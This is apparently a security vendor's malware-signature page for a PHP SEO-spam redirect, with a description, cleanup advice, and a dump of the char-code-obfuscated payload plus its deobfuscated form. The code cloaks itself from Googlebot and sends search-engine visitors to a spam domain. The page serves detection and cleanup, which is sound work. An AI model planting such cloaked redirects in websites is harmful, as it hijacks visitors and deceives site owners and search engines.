Malware Signatures

  1. Home
  2. Malware Signatures
  3. php.spam-seo.header_location.021

php.spam-seo.header_location.021

Redirecting website traffic is another Blackhat SEO malicious technique. BlackHat SEO is used to manipulate the search engine results in order to benefit a website in terms of relevance.
The function header() is used to redirect the user when the site is rendered, another case of innocent functions being used for malicious purposes. The attacker may also use PHP obfuscation techinques to hide its contents.

Affecting

Any vulnerable PHP based website. Outdated software or compromised passwords can act as an infection vector.

Cleanup

Inspect your site's files looking for obfuscated code (similar to the dump below) or files that you don't recognize. Also you can sign up with us and let our team remove the malware for you.

Dump


<?php $data=array(101,114,114,111,11100,101,114,115,95,115,101,36,95,83,69,82,86,69,82,91,39,72,84,84,80,95,85,83,69,82,95,65,71,69,78,84,39,93,41,41,123,32,105,102,32,40,105,115,115,101,116,40,36,95,83,69,82,86,69,82,91,39,72,84,84,80,95,82,69,70,69,82,69,82,39,93,41,41,123,32,105,102,32,40,40,112,114,101,103,95,109,97,116,99,104,32,40,34,47,77,83,73,69,32,40,57,46,48,124,49,48,46,48,41,47,34,44,36,95,83,69,82,86,69,82,91,39,72,84,84,80,95,85,83,69,82,95,65,71,69,78,84,39,93,41,41,32,111,114,32,40,112,114,101,103,95,109,97,116,99,104,32,40,34,47,114,118,58,91,48,45,57,93,43,92,46,48,92,41,32,108,105,107,101,32,71,101,99,107,111,47,34,44,36,95,83,69,82,86,69,82,91,39,72,84,84,80,95,85,83,69,82,95,65,71,69,78,84,39,93,41,41,32,111,114,32,40,112,114,101,103,95,109,97,116,99,104,32,40,34,47,70,105,114,101,102,111,120,92,47,40,91,48,45,57,93,43,92,46,48,41,47,34,44,36,95,83,69,82,86,69,82,91,39,72,84,84,80,95,85,83,69,82,95,65,71,69,78,84,39,93,44,36,109,97,116,99,104,102,41,32,97,110,100,32,36,109,97,116,99,104,102,91,49,93,62,49,49,41,41,123,32,105,102,40,33,112,114,101,103,95,109,97,116,99,104,40,34,47,94,54,54,92,46,50,52,57,92,46,47,34,44,36,95,83,69,82,86,69,82,91,39,82,69,77,79,84,69,95,65,68,68,82,39,93,41,41,123,32,105,102,32,40,115,116,114,105,115,116,114,40,36,95,83,69,82,86,69,82,91,39,72,84,84,80,95,82,69,70,69,82,69,82,39,93,44,34,121,97,104,111,111,46,34,41,32,111,114,32,115,116,114,105,115,116,114,40,36,95,83,69,82,86,69,82,91,39,72,84,84,80,95,82,69,70,69,82,69,82,39,93,44,34,98,105,110,103,46,34,41,32,111,114,32,112,114,101,103,95,109,97,116,99,104,32,40,34,47,103,111,111,103,108,101,92,46,40,46,42,63,41,92,47,117,114,108,92,63,115,97,47,34,44,36,95,83,69,82,86,69,82,91,39,72,84,84,80,95,82,69,70,69,82,69,82,39,93,41,41,32,123,32,105,102,32,40,33,115,116,114,105,115,116,114,40,36,95,83,69,82,86,69,82,91,39,72,84,84,80,95,82,69,70,69,82,69,82,39,93,44,34,99,97,99,104,101,34,41,32,97,110,100,32,33,115,116,114,105,115,116,114,40,36,95,83,69,82,86,69,82,91,39,72,84,84,80,95,82,69,70,69,82,69,82,39,93,44,34,105,110,117,114,108,34,41,32,97,110,100,32,33,115,116,114,105,115,116,114,40,36,95,83,69,82,86,69,82,91,39,72,84,84,80,95,82,69,70,69,82,69,82,39,93,44,34,69,101,89,112,51,68,55,34,41,41,123,32,104,101,97,100,101,114,40,34,76,111,99,97,116,105,111,110,58,32,104,116,116,112,58,47,47,113,111,102,104,116,104,106,110,122,46,114,101,98,97,116,101,115,114,117,108,101,46,110,101,116,47,34,41,59,32,101,120,105,116,40,41,59,32,125,32,125,32,125,32,125,32,125,32,125,32,125);$code="";foreach ($data as $var){ $code.=chr($var);} echo($code); unset($data);$unset($code);?>
Deobfuscated code:
error_reporting(0); if (!headers_sent()){ if (isset($_SERVER['HTTP_USER_AGENT'])){ if (isset($_SERVER['HTTP_REFERER'])){ if ((preg_match ("/MSIE (9.0|10.0)/"$_SERVER['HTTP_USER_AGENT'])) or (preg_match ("/rv:[0-9]+.0) like Gecko/"$_SERVER['HTTP_USER_AGENT'])) or (preg_match ("/Firefox/([0-9]+.0)/"$_SERVER['HTTP_USER_AGENT']$matchf) and $matchf[1]>11)){ if(!preg_match("/^66.249./"$_SERVER['REMOTE_ADDR'])){ if (stristr($_SERVER['HTTP_REFERER']"yahoo.") or stristr($_SERVER['HTTP_REFERER']"bing.") or preg_match ("/google.(.*?)/url?sa/"$_SERVER['HTTP_REFERER'])) { if (!stristr($_SERVER['HTTP_REFERER']"cache") and !stristr($_SERVER['HTTP_REFERER']"inurl") and !stristr($_SERVER['HTTP_REFERER']"EeYp3D7")){ header("Location: http:// site removed/"); exit(); } } } } } } }